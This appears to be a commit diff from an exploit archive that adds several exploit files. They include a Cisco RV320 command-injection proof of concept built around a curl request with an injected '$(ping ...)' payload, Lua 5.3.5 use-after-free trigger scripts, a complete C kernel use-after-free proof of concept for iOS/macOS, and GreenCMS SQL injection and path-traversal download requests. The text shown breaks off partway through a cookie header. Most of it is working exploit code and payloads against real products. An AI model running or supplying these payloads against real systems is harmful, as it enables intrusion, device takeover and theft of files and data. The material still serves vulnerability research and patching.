DB: 2019-01-26

6 changes to exploits/shellcodes Lua 5.3.5 - 'debug.upvaluejoin' Use After Free iOS/macOS - 'task_swap_mach_voucher()' Use-After-Free Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection GreenCMS 2.x - SQL Injection GreenCMS 2.x - Arbitrary File Download Wordpress Plugin Wisechat 2.6.3 - Reverse Tabnabbing
2019-01-26 05:01:42 +00:00 · 2019-01-26 05:01:42 +00:00 · 5a69ff88a0
commit 5a69ff88a0
parent 6e7548ed0d
7 changed files with 736 additions and 0 deletions
--- a/exploits/hardware/webapps/46243.txt
+++ b/exploits/hardware/webapps/46243.txt
@ -0,0 +1,143 @@
 RedTeam Pentesting discovered a command injection vulnerability in the
 web-based certificate generator feature of the Cisco RV320 router.
 Details
 =======
 Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
 Affected Versions: 1.4.2.15 and later
 Fixed Versions: since 1.4.2.20
 Vulnerability Type: Remote Code Execution
 Security Risk: medium
 Vendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
 Vendor Status: fixed version released
 Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-004
 Advisory Status: published
 CVE: CVE-2019-1652
 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652
 Introduction
 ============
 "Keep your employees, your business, and yourself productive and
 effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
 choice for any small office or small business looking for performance,
 security, and reliability in its network."
 (from the Cisco RV320 product page [1])
 More Details
 ============
 The router's web interface enables users to generate new X.509
 certificates directly on the device. A user may enter typical
 configuration parameters required for the certificate, such as
 organisation, the common name and so on. In order to generate the
 certificate, the device uses the command-line program openssl [2]. The
 device's firmware uses the following format string to assemble the
 openssl command:
 ------------------------------------------------------------------------
 openssl req -new  -nodes  -subj '/C=%s/ST=%s/L=%s/O=%s/OU=%s/CN=%s/emailAddress=%s' -keyout %s%s.key -sha256 -out %s%s.csr -days %s -newkey rsa:%s  > /dev/null 2>&1
 ------------------------------------------------------------------------
 Although the web interface filters certain special characters via
 JavaScript, there is actually no input filtering, escaping or encoding
 happening on the server. This allows attackers to inject arbitrary
 commands.
 Proof of Concept
 ================
 Even though all components of the subject seem to be vulnerable to
 command injection, the following example uses the common name to trigger
 a ping command:
 ------------------------------------------------------------------------
 a'$(ping -c 4 192.168.1.2)'b
 ------------------------------------------------------------------------
 The following HTTP POST request invokes the certificate generator
 function and triggers the command injection. It requires a valid session
 cookie for the device's web interface.
 ------------------------------------------------------------------------
 curl -s -b "$COOKIE" \
 --data "page=self_generator.htm&totalRules=1&OpenVPNRules=30"\
 "&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A"\
 "&organization=A&organization_unit=A&email=ab%40example.com"\
 "&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&"\
 "SelectSubject_s=1" \
 --data-urlencode "common_name=a'\$(ping -c 4 192.168.1.2)'b" \
 "http://192.168.1.1/certificate_handle2.htm?type=4"
 ------------------------------------------------------------------------
 Afterwards, the incoming ICMP echo requests can be observed on the
 attacker's system at 192.168.1.2.
 Workaround
 ==========
 Prevent untrusted users from using the router's web interface.
 Fix
 ===
 Install firmware version 1.4.2.20 (or later) on the router.
 Security Risk
 =============
 The vulnerability allows attackers with administrative access to the
 router's web interface to execute arbitrary operating system commands on
 the device. Because attackers require valid credentials to the web
 interface, this vulnerability is only rated as a medium risk.
 Timeline
 ========
 2018-09-19 Vulnerability identified
 2018-09-27 Customer approved disclosure to vendor
 2018-09-28 Vendor notified
 2018-10-05 Receipt of advisory acknowledged by vendor
 2018-10-05 Notified vendor of disclosure date: 2019-01-09
 2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
 2019-01-16 List of affected versions provided by vendor
 2019-01-23 Advisory published
 References
 ==========
 [1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
 [2] https://wiki.openssl.org/index.php/Command_Line_Utilities
 RedTeam Pentesting GmbH
 =======================
 RedTeam Pentesting offers individual penetration tests performed by a
 team of specialised IT-security experts. Hereby, security weaknesses in
 company networks or products are uncovered and can be fixed immediately.
 As there are only few experts in this field, RedTeam Pentesting wants to
 share its knowledge and enhance the public knowledge with research in
 security-related areas. The results are made available as public
 security advisories.
 More information about RedTeam Pentesting can be found at:
 https://www.redteam-pentesting.de/
 Working at RedTeam Pentesting
 =============================
 RedTeam Pentesting is looking for penetration testers to join our team
 in Aachen, Germany. If you are interested please visit:
 https://www.redteam-pentesting.de/jobs/
--- a/exploits/multiple/dos/46246.txt
+++ b/exploits/multiple/dos/46246.txt
@ -0,0 +1,70 @@
 # Exploit Title: Lua 5.3.5
 # Exploit Author: Fady Mohamed Osman (https://twitter.com/fady_othman)
 # Exploit-db : http://www.exploit-db.com/author/?a=2986
 # Blog : https://blog.fadyothman.com/
 # Date: Jan. 10th 2019
 # Vendor Homepage: https://www.lua.org/
 # Software Link: https://www.lua.org/ftp/lua-5.3.5.tar.gz
 # Version: 5.3.5
 # CVE ID: CVE-2019-6706
 During a fuzz session using "AFL", I found a heap use after free in lua
 5.3.5, after analysis of the crash I found the root cause of the
 vulnerability, here's the details.
 The function `lua_upvaluejoin` in file lapi.c at line 1287 suffers from a
 use after free bug when supplied the same function for parameter f1 and f2
 and the same upvalue index, additionally I found that the bug is only
 triggered when the upvalue is closed, this happens because the
 `luaC_upvdeccount` function found in file lgc.c at line 678 will decrement
 the refcount and then free the upvalue if the refcount is zero and if the
 upvalue is closed.
 See the comments below for more explanation.
 --------------
 LUA_API void lua_upvaluejoin (lua_State *L, int fidx1, int n1,
                                            int fidx2, int n2) {
  LClosure *f1;
  UpVal **up1 = getupvalref(L, fidx1, n1, &f1);
  UpVal **up2 = getupvalref(L, fidx2, n2, NULL);
  luaC_upvdeccount(L, *up1);      //Will delete up1
  *up1 = *up2;     //up1 is up2 because it's the same upvalue and now it's
 freed.
  (*up1)->refcount++;   //up1 is freed, yet it's used here.
  if (upisopen(*up1)) (*up1)->u.open.touched = 1;
  luaC_upvalbarrier(L, *up1);
 }
 --------------
 - To trigger the bug simply use a lua program like this (this one will
 crash):
 --
 f=load(function() end)
 interesting={}
 interesting[0]=string.rep("A",512)
 debug.upvaluejoin(f,1,f,1)
 ---
 - Another program that will not crash (unless you compile with
 -fsanitize=address):
 ---
 function w()
 local x = {}
 f = function() print(x) end
 end
 w()
 debug.upvaluejoin(f,2,f,2)
 ---
 If you want a fix you can use the patch provided here:
 http://lua.2524044.n2.nabble.com/CVE-2019-6706-use-after-free-in-lua-upvaluejoin-function-tc7685575.html
 Timeline:
 - Jan 10th 2019 : Vulnerability discovered and reported to lua mailing list.
 - Jan 23rd 2019 : CVE Identifier obtained.
 - Jan 25th 2019 : Fix is suggested by Matěj Cepl.
 Refrences:
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6706
 https://security-tracker.debian.org/tracker/CVE-2019-6706
 https://vuldb.com/?id.130228
--- a/exploits/multiple/dos/46248.c
+++ b/exploits/multiple/dos/46248.c
@ -0,0 +1,375 @@
 /*
 * voucher_swap-poc.c
 * Brandon Azad
 */
 #if 0
 iOS/macOS: task_swap_mach_voucher() does not respect MIG semantics leading to use-after-free
 The dangers of not obeying MIG semantics have been well documented: see issues 926 (CVE-2016-7612),
 954 (CVE-2016-7633), 1417 (CVE-2017-13861, async_wake), 1520 (CVE-2018-4139), 1529 (CVE-2018-4206),
 and 1629 (no CVE), as well as CVE-2018-4280 (blanket). However, despite numerous fixes and
 mitigations, MIG issues persist and offer incredibly powerful exploit primitives. Part of the
 problem is that MIG semantics are complicated and unintuitive and do not align well with the
 kernel's abstractions.
 Consider the MIG routine task_swap_mach_voucher():
 	routine task_swap_mach_voucher(
 			task		: task_t;
 			new_voucher	: ipc_voucher_t;
 		inout	old_voucher	: ipc_voucher_t);
 Here's the (placeholder) implementation:
 	kern_return_t
 	task_swap_mach_voucher(
 		task_t			task,
 		ipc_voucher_t		new_voucher,
 		ipc_voucher_t		*in_out_old_voucher)
 	{
 		if (TASK_NULL == task)
 			return KERN_INVALID_TASK;
 		*in_out_old_voucher = new_voucher;
 		return KERN_SUCCESS;
 	}
 The correctness of this implementation depends on exactly how MIG ownership semantics are defined
 for each of these parameters.
 When dealing with Mach ports and out-of-line memory, ownership follows the traditional rules (the
 ones violated by the bugs above):
 1. All Mach ports (except the first) passed as input parameters are owned by the service routine if
   and only if the service routine returns success. If the service routine returns failure then MIG
   will deallocate the ports.
 2. All out-of-line memory regions passed as input parameters are owned by the service routine if
   and only if the service routine returns success. If the service routine returns failure then MIG
   will deallocate all out-of-line memory.
 But this is only part of the picture. There are more rules for other types of objects:
 3. All objects with defined MIG translations that are passed as input-only parameters are borrowed
   by the service routine. For reference-counted objects, this means that the service routine is
   not given a reference, and hence a reference must be added if the service routine intends to
   keep the object around.
 4. All objects with defined MIG translations that are returned in output parameters must be owned
   by the output parameter. For reference-counted objects, this means that output parameters
   consume a reference on the object.
 And most unintuitive of all:
 5. All objects with defined MIG translations that are passed as input in input-output parameters
   are owned (not borrowed!) by the service routine. This means that the service routine must
   consume the input object's reference.
 Having defined MIG translations means that there is an automatic conversion defined between the
 object type and its Mach port representation. A task port is one example of such a type: you can
 convert a task port to the underlying task object using convert_port_to_task(), and you can convert
 a task to its corresponding port using convert_task_to_port().
 Getting back to Mach vouchers, this is the MIG definition of ipc_voucher_t:
 	type ipc_voucher_t = mach_port_t
 			intran: ipc_voucher_t convert_port_to_voucher(mach_port_t)
 			outtran: mach_port_t convert_voucher_to_port(ipc_voucher_t)
 			destructor: ipc_voucher_release(ipc_voucher_t)
 		        ;
 This definition means that MIG will automatically convert the voucher port input parameters to
 ipc_voucher_t objects using convert_port_to_voucher(), convert the ipc_voucher_t output parameters
 into ports using convert_voucher_to_port(), and discard any extra references using
 ipc_voucher_release(). Note that convert_port_to_voucher() produces a voucher reference without
 consuming a port reference, while convert_voucher_to_port() consumes a voucher reference and
 produces a port reference.
 To confirm our understanding of the MIG semantics outlined above, we can look at the function
 _Xtask_swap_mach_voucher(), which is generated by MIG during the build process:
 	mig_internal novalue _Xtask_swap_mach_voucher
 		(mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP)
 	{
 	...
 		kern_return_t RetCode;
 		task_t task;
 		ipc_voucher_t new_voucher;
 		ipc_voucher_t old_voucher;
 	...
 		task = convert_port_to_task(In0P->Head.msgh_request_port);
 		new_voucher = convert_port_to_voucher(In0P->new_voucher.name);
 		old_voucher = convert_port_to_voucher(In0P->old_voucher.name);
 		RetCode = task_swap_mach_voucher(task, new_voucher, &old_voucher);
 		ipc_voucher_release(new_voucher);
 		task_deallocate(task);
 		if (RetCode != KERN_SUCCESS) {
 			MIG_RETURN_ERROR(OutP, RetCode);
 		}
 	...
 		if (IP_VALID((ipc_port_t)In0P->old_voucher.name))
 			ipc_port_release_send((ipc_port_t)In0P->old_voucher.name);
 		if (IP_VALID((ipc_port_t)In0P->new_voucher.name))
 			ipc_port_release_send((ipc_port_t)In0P->new_voucher.name);
 	...
 		OutP->old_voucher.name = (mach_port_t)convert_voucher_to_port(old_voucher);
 		OutP->Head.msgh_bits |= MACH_MSGH_BITS_COMPLEX;
 		OutP->Head.msgh_size = (mach_msg_size_t)(sizeof(Reply));
 		OutP->msgh_body.msgh_descriptor_count = 1;
 	}
 Tracing where each of the references are going, we can deduce that:
 1. The new_voucher parameter is deallocated with ipc_voucher_release() after invoking the service
   routine, so it is not owned by task_swap_mach_voucher(). In other words,
   task_swap_mach_voucher() is not given a reference on new_voucher.
 2. The old_voucher parameter has a reference on it before it gets overwritten by
   task_swap_mach_voucher(), which means task_swap_mach_voucher() is being given a reference on the
   input value of old_voucher.
 3. The value returned by task_swap_mach_voucher() in old_voucher is passed to
   convert_voucher_to_port(), which consumes a reference on the voucher. Thus,
   task_swap_mach_voucher() is giving _Xtask_swap_mach_voucher() a reference on the output value of
   old_voucher.
 Finally, looking back at the implementation of task_swap_mach_voucher(), we can see that none of
 these rules are being followed:
 	kern_return_t
 	task_swap_mach_voucher(
 		task_t			task,
 		ipc_voucher_t		new_voucher,
 		ipc_voucher_t		*in_out_old_voucher)
 	{
 		if (TASK_NULL == task)
 			return KERN_INVALID_TASK;
 		*in_out_old_voucher = new_voucher;
 		return KERN_SUCCESS;
 	}
 This results in two separate reference counting issues:
 1. By overwriting the value of in_out_old_voucher without first releasing the reference, we are
   leaking a reference on the input value of old_voucher.
 2. By assigning the value of new_voucher to in_out_old_voucher without adding a reference, we are
   consuming a reference we don't own, leading to an over-release of new_voucher.
 Now, Apple has previously added a mitigation to make reference count leaks on Mach ports
 non-exploitable by having the reference count saturate before it overflows. However, this
 mitigation is not relevant here because we're leaking a reference on the actual ipc_voucher_t, not
 on the voucher port that represents the voucher. And looking at the implementation of
 ipc_voucher_reference() and ipc_voucher_release() (as of macOS 10.13.6), it's clear that the
 voucher reference count is tracked independently of the port reference count:
 	void
 	ipc_voucher_reference(ipc_voucher_t voucher)
 	{
 		iv_refs_t refs;
 		if (IPC_VOUCHER_NULL == voucher)
 			return;
 		refs = iv_reference(voucher);
 		assert(1 < refs);
 	}
 	void
 	ipc_voucher_release(ipc_voucher_t voucher)
 	{
 		if (IPC_VOUCHER_NULL != voucher)
 			iv_release(voucher);
 	}
 	static inline iv_refs_t
 	iv_reference(ipc_voucher_t iv)
 	{
 		iv_refs_t refs;
 		refs = hw_atomic_add(&iv->iv_refs, 1);
 		return refs;
 	}
 	static inline void
 	iv_release(ipc_voucher_t iv)
 	{
 		iv_refs_t refs;
 		assert(0 < iv->iv_refs);
 		refs = hw_atomic_sub(&iv->iv_refs, 1);
 		if (0 == refs)
 			iv_dealloc(iv, TRUE);
 	}
 (The assert()s are not live on production builds.)
 This vulnerability can be triggered without crossing any privilege/MACF checks, so it should be
 reachable within every process and every sandbox.
 On iOS 11 and macOS 10.13, both the over-reference and over-release vulnerabilities can be
 independently exploited to free an ipc_voucher_t while it is still in use. On these platforms these
 are incredibly powerful vulnerabilities, since they also let us receive a send right to a
 freed-and-reallocated Mach port back in userspace. For some examples of why this is dangerous, see
 Ian's thoughts in issue 941: <https://bugs.chromium.org/p/project-zero/issues/detail?id=941#c3>.
 As of iOS 12 and macOS 10.14, the voucher reference count is checked for underflow and overflow,
 which does make the over-reference vulnerability non-exploitable. However, the over-release
 vulnerability is still fully exploitable, and probably can still be used as a single,
 direct-to-kernel bug from any process.
 Additionally, while this report is of a single bug, it should indicate a wider problem with the
 complexity of obeying MIG semantics. It might be worth reviewing other edge cases of MIG semantics
 not covered by previous bugs.
 (There's a variant of the over-reference vulnerability in thread_swap_mach_voucher(), but it is no
 longer exploitable as of iOS 12.)
 This proof-of-concept demonstrates the vulnerability by creating a Mach voucher, saving a reference
 to it in the current thread's ith_voucher field via thread_set_mach_voucher(), decreasing the
 reference count back to 1 using task_swap_mach_voucher(), and then freeing the voucher by
 deallocating the voucher port in userspace. This leaves a dangling pointer to the freed voucher's
 memory in ith_voucher, which can subsequently be accessed with a call to thread_get_mach_voucher(),
 triggering a panic.
 Tested on macOS 10.13.6 (17G4015), macOS 10.14.2, and iOS 12.1 (16B92).
 #endif
 #include <assert.h>
 #include <mach/mach.h>
 #include <stdio.h>
 #include <unistd.h>
 // Stash the host port for create_voucher().
 mach_port_t host;
 /*
 * create_voucher
 *
 * Description:
 * 	Create a Mach voucher. If id is unique, then this will be a unique voucher (until another
 * 	call to this function with the same id).
 *
 * 	A Mach voucher port for the voucher is returned. The voucher has 1 reference, while the
 * 	voucher port has 2 references and 1 send right.
 */
 static mach_port_t
 create_voucher(uint64_t id) {
 	assert(host != MACH_PORT_NULL);
 	mach_port_t voucher = MACH_PORT_NULL;
 #pragma clang diagnostic push
 #pragma clang diagnostic ignored "-Wgnu-variable-sized-type-not-at-end"
 	struct __attribute__((packed)) {
 		mach_voucher_attr_recipe_data_t user_data_recipe;
 		uint64_t user_data_content[2];
 	} recipes = {};
 #pragma clang diagnostic pop
 	recipes.user_data_recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;
 	recipes.user_data_recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;
 	recipes.user_data_recipe.content_size = sizeof(recipes.user_data_content);
 	recipes.user_data_content[0] = getpid();
 	recipes.user_data_content[1] = id;
 	kern_return_t kr = host_create_mach_voucher(
 			host,
 			(mach_voucher_attr_raw_recipe_array_t) &recipes,
 			sizeof(recipes),
 			&voucher);
 	assert(kr == KERN_SUCCESS);
 	assert(voucher != MACH_PORT_NULL);
 	return voucher;
 }
 /*
 * voucher_tweak_references
 *
 * Description:
 * 	Use the task_swap_mach_voucher() vulnerabilities to modify the reference counts of 2
 * 	vouchers. 
 *
 */
 static void
 voucher_tweak_references(mach_port_t release_voucher, mach_port_t reference_voucher) {
 	// Call task_swap_mach_voucher() to tweak the reference counts (two bugs in one!).
 	mach_port_t inout_voucher = reference_voucher;
 	kern_return_t kr = task_swap_mach_voucher(mach_task_self(), release_voucher, &inout_voucher);
 	assert(kr == KERN_SUCCESS);
 	// At this point we've successfully tweaked the voucher reference counts, but our port
 	// reference counts might be messed up because of the voucher port returned in
 	// inout_voucher! We need to deallocate it (it's extra anyways, since
 	// task_swap_mach_voucher() doesn't swallow the existing send rights).
 	if (MACH_PORT_VALID(inout_voucher)) {
 		kr = mach_port_deallocate(mach_task_self(), inout_voucher);
 		assert(kr == KERN_SUCCESS);
 	}
 }
 /*
 * voucher_reference
 *
 * Description:
 * 	Add a reference to the voucher represented by the voucher port.
 */
 static void
 voucher_reference(mach_port_t voucher) {
 	voucher_tweak_references(MACH_PORT_NULL, voucher);
 }
 /*
 * voucher_release
 *
 * Description:
 * 	Release a reference on the voucher represented by the voucher port.
 */
 static void
 voucher_release(mach_port_t voucher) {
 	voucher_tweak_references(voucher, MACH_PORT_NULL);
 }
 /*
 * thread_stash_freed_voucher
 *
 * Description:
 * 	Stash a pointer to a freed voucher object in the current thread's ith_voucher field. This
 * 	voucher can be accessed later with thread_get_mach_voucher().
 */
 static void
 thread_stash_freed_voucher(mach_port_t thread_self) {
 	// Create a unique voucher. This voucher will have 1 voucher reference, 2 port references,
 	// and 1 port send right.
 	mach_port_t voucher = create_voucher(0);
 	// Stash a copy of the voucher in our thread. This will bump the voucher references to 2.
 	kern_return_t kr = thread_set_mach_voucher(thread_self, voucher);
 	assert(kr == KERN_SUCCESS);
 	// Now drop the voucher reference count to 1. The port reference count is still 2.
 	voucher_release(voucher);
 	// Next deallocate our send right to the voucher port. This drops the port send right
 	// count to 0 (although the port reference count is still 1), causing a no-senders
 	// notification to be triggered. The no-senders notification calls ipc_voucher_notify(),
 	// which releases the final voucher reference. In the process of freeing the voucher,
 	// ipc_port_dealloc_kernel() is called on the port, so the port is also freed.
 	kr = mach_port_deallocate(mach_task_self(), voucher);
 	assert(kr == KERN_SUCCESS);
 	// This leaves a dangling pointer to the voucher in thread_self->ith_voucher. We can access
 	// the freed voucher and voucher port with a call to thread_get_mach_voucher().
 }
 int
 main(int argc, const char *argv[]) {
 	host = mach_host_self();
 	mach_port_t thread = mach_thread_self();
 	// Stash a pointer to a freed ipc_voucher_t in this thread's ith_voucher field.
 	thread_stash_freed_voucher(thread);
 	// The following call should trigger a panic.
 	mach_port_t voucher;
 	thread_get_mach_voucher(thread, 0, &voucher);
 	return 0;
 }
--- a/exploits/php/webapps/46244.txt
+++ b/exploits/php/webapps/46244.txt
@ -0,0 +1,38 @@
 # Exploit Title: Green CMS 2.x - SQL Injection
 # Dork: N/A
 # Date: 2019-01-25
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: http://www.greencms.net/
 # Software Link: https://codeload.github.com/GreenCMS/GreenCMS/zip/beta
 # Version: 2.x
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # POC: 
 # 1)
 # http://localhost/[PATH]/index.php?m=admin&c=posts&a=index&cat=[SQL]
 # 
 GET /[PATH]/index.php?m=admin&c=posts&a=index&cat=1%27))%20AND%201=BENCHMARK(100000000,MD5(0x456665))--%20- HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=9kv875ue1nd30aem1r11v7j4e1; scd39=d417d5511c72c08320; token=0d74f7745ef2ae866371f379887de13b; poll-20190124084438702=x; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1548345007; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1548345007; iCMS_iCMS_AUTH=23fead6b8NDfVdP8qVNpOPIPPUSpFJAso5x4PtfIdZ3nDi8o5wnWMSK3ChFfVeYSOHBG1oexoFRdZvpgU83b8Jf61eMlofgor_cA_M03jKYoXB3uVFTNACLmbQ; iCMS_USER_AUTH=219cbaebs-OpY5sJLvCCKTR3Dqt_oCHrxJW69eyU4H8ydfrP-oU2o_WTjmpI2rq_RlGfFU7z4khePqUAE_-e9BZoY7JqRmHEdQMwgIHvOFkLMuEm_MfWL5q_YjuZtjifggqF00S7XifyDwBoSSjLHF5_75serNlj4UzaM2Jx1UNECipmSjn0_LbHUxywdjrykOLebAf5KahIejKgbmJs25r1GkYT7kNAC4NCYzy8Bohr1Ty1LQpYq1D3Rid_82phOUD4q6sY3Ndaj8les5sAJvkEmXOwI8_y6lqBjZarygWlIh_O6b-nvRiE2cbaaMFsxJZZUlRvYU6RUWihB9yhFfg8UOZ9A41c_BdcyREjmQEGPPzBZnHBXZv4SbG-tj1gRr-L40L6EdGX-oKrbDC4oyt6vB0UzyzN9CZP5ZKWn8GzFGJAMWF7kFjPD_upiZiBd-rHyPyCZb0Tsr6920eRpm5ZPLiJ-cfKsR0Gm1s5vvsYO9BsTG1FogUhQwzjHbT4lIO3lUcpvxYSSc9wbE3R1izg2wME6ATQ6PEnszM; iCMS_userid=32dfb608S9QlPEJd2BZY81z70jgnBnJldGAo3OuRdbLJJbk_Qw; iCMS_nickname=32dfb608S9QlPEJd2BZY81b63296UnYxe2Yv3riRc-edc-xqFRw; ICMSSESSION=pahh0r0jsr9gre9e0vn1jmqp23; /PATH/modules/system/admin.php_SystemCustomtag_sortsel=name; /PATH/modules/system/admin.php_SystemCustomtag_ordersel=ASC; /PATH/modules/system/admin.php_limitsel=15; /PATH/modules/system/admin.php_SystemCustomtag_filtersel=default; /PATH/modules/system/admin.php_SystemPages_sortsel=page_title; /PATH/modules/system/admin.php_SystemPages_ordersel=ASC; /PATH/modules/system/admin.php_SystemPages_filtersel=default; /PATH/modules/content/admin/content.php_mod_content_Content_sortsel=content_title; /PATH/modules/content/admin/content.php_mod_content_Content_ordersel=ASC; /PATH/modules/content/admin/content.php_limitsel=15; /PATH/modules/content/admin/content.php_mod_content_Content_filtersel=default; Hm_lvt_48659a4ab85f1bcebb11d3dd3ecb6760=1548351649; Hm_lpvt_48659a4ab85f1bcebb11d3dd3ecb6760=1548355214; greencms_last_visit_page=aHR0cDovL2xvY2FsaG9zdC9leHBsb2l0ZGIvZ3JlZW5jbXMtYmV0YS9pbmRleC5waHA%2FbT1hZG1pbiZjPXBvc3RzJmE9aW5kZXgmY2F0PTElMjcpKSUyMEFORCUyMDE9QkVOQ0hNQVJLKDEwMDAwMDAwMCxNRDUoRWZlKSktLSUyMC0%3D; greencms_post_add1=x%9Cm%901k%C30%10%85%FFJ%D0%ECPI%B5-%5B%84%2C%1D2e%EAX%85%60YgG%E0%D8%22%3A%0D%A1%F4%BF%F7%9C+%C8%90%ED%DE%BB%EF%C1%BB%FBea%89xF%8F%130%CDL%AA%AD%94%265C%0F%26%95%83%1ALR%95l%0E7%80%F9%EB%F8%CD%8A%27%DF%2F3%C2%8C%94%D8%85%FD%0A%D6%DC%A4%AAU%AE+%01%A2%5ESe%BF3%1Fa%9F%23%DE%11-%B2%8A%D8a%8A%E4%84d%27%1F%2F%D9%C7%7BX%7BD%3F%8FT%28%9Bp%0DS%87o%16K+%8Fg%E9%9E%8C%E4%A2%DDr%B1%95%E5Fr%FD%D9jYg%E2%BA8%3Fxp%AFT%B5%E1Rs%A1%C5J%F5%1DR%AB%1F%2Az%2A%18v%E3C%D0W%5Ci%E9%2B%D6U47%5C%D1%7DV%01%3B%FD%FD%03%84%F0b%FF
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 HTTP/1.1 200 OK
 Date: Thu, 24 Jan 2019 22:36:36 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: GreenCMS Community Version
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: private
 Pragma: no-cache
 Set-Cookie: greencms_last_visit_page=aHR0cDovL2xvY2FsaG9zdC9leHBsb2l0ZGIvZ3JlZW5jbXMtYmV0YS9pbmRleC5waHA%2FbT1hZG1pbiZjPXBvc3RzJmE9aW5kZXgmY2F0PTElMjcpKSUyMEFORCUyMDE9QkVOQ0hNQVJLKDEwMDAwMDAwMCxNRDUoMHg0NTY2NjUpKS0tJTIwLQ%3D%3D; expires=Sat, 23-Feb-2019 19:14:36 GMT; Max-Age=2592000; path=/
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Transfer-Encoding: chunked
 Content-Type: text/html; charset=
--- a/exploits/php/webapps/46245.txt
+++ b/exploits/php/webapps/46245.txt
@ -0,0 +1,70 @@
 # Exploit Title: Green CMS 2.x - Arbitrary File & Directory Download
 # Dork: N/A
 # Date: 2019-01-25
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: http://www.greencms.net/
 # Software Link: https://codeload.github.com/GreenCMS/GreenCMS/zip/beta
 # Version: 2.x
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # POC: 
 # 1)
 # http://localhost/[PATH]/index.php?m=admin&c=custom&a=themeexporthandle&theme_name=[Directory]
 # 
 # /[PATH]/Data/exploitdb-313a669df7bd2494db4b81855ad9ffb4.zip
 GET /[PATH]/index.php?m=admin&c=custom&a=themeexporthandle&theme_name=../../../exploitdb HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=9kv875ue1nd30aem1r11v7j4e1; scd39=d417d5511c72c08320; token=0d74f7745ef2ae866371f379887de13b; roxyview=grid; roxyld=%2FExploitDb%2Fglfusion-1.7.6%2Fpublic_html%2Fimages; poll-20190124084438702=x; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1548345007; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1548345007; iCMS_iCMS_AUTH=23fead6b8NDfVdP8qVNpOPIPPUSpFJAso5x4PtfIdZ3nDi8o5wnWMSK3ChFfVeYSOHBG1oexoFRdZvpgU83b8Jf61eMlofgor_cA_M03jKYoXB3uVFTNACLmbQ; iCMS_USER_AUTH=219cbaebs-OpY5sJLvCCKTR3Dqt_oCHrxJW69eyU4H8ydfrP-oU2o_WTjmpI2rq_RlGfFU7z4khePqUAE_-e9BZoY7JqRmHEdQMwgIHvOFkLMuEm_MfWL5q_YjuZtjifggqF00S7XifyDwBoSSjLHF5_75serNlj4UzaM2Jx1UNECipmSjn0_LbHUxywdjrykOLebAf5KahIejKgbmJs25r1GkYT7kNAC4NCYzy8Bohr1Ty1LQpYq1D3Rid_82phOUD4q6sY3Ndaj8les5sAJvkEmXOwI8_y6lqBjZarygWlIh_O6b-nvRiE2cbaaMFsxJZZUlRvYU6RUWihB9yhFfg8UOZ9A41c_BdcyREjmQEGPPzBZnHBXZv4SbG-tj1gRr-L40L6EdGX-oKrbDC4oyt6vB0UzyzN9CZP5ZKWn8GzFGJAMWF7kFjPD_upiZiBd-rHyPyCZb0Tsr6920eRpm5ZPLiJ-cfKsR0Gm1s5vvsYO9BsTG1FogUhQwzjHbT4lIO3lUcpvxYSSc9wbE3R1izg2wME6ATQ6PEnszM; iCMS_userid=32dfb608S9QlPEJd2BZY81z70jgnBnJldGAo3OuRdbLJJbk_Qw; iCMS_nickname=32dfb608S9QlPEJd2BZY81b63296UnYxe2Yv3riRc-edc-xqFRw; ICMSSESSION=pahh0r0jsr9gre9e0vn1jmqp23; /PATH/modules/system/admin.php_SystemCustomtag_sortsel=name; /PATH/modules/system/admin.php_SystemCustomtag_ordersel=ASC; /PATH/modules/system/admin.php_limitsel=15; /PATH/modules/system/admin.php_SystemCustomtag_filtersel=default; /PATH/modules/system/admin.php_SystemPages_sortsel=page_title; /PATH/modules/system/admin.php_SystemPages_ordersel=ASC; /PATH/modules/system/admin.php_SystemPages_filtersel=default; /PATH/modules/content/admin/content.php_mod_content_Content_sortsel=content_title; /PATH/modules/content/admin/content.php_mod_content_Content_ordersel=ASC; /PATH/modules/content/admin/content.php_limitsel=15; /PATH/modules/content/admin/content.php_mod_content_Content_filtersel=default; Hm_lvt_48659a4ab85f1bcebb11d3dd3ecb6760=1548351649; Hm_lpvt_48659a4ab85f1bcebb11d3dd3ecb6760=1548355214; 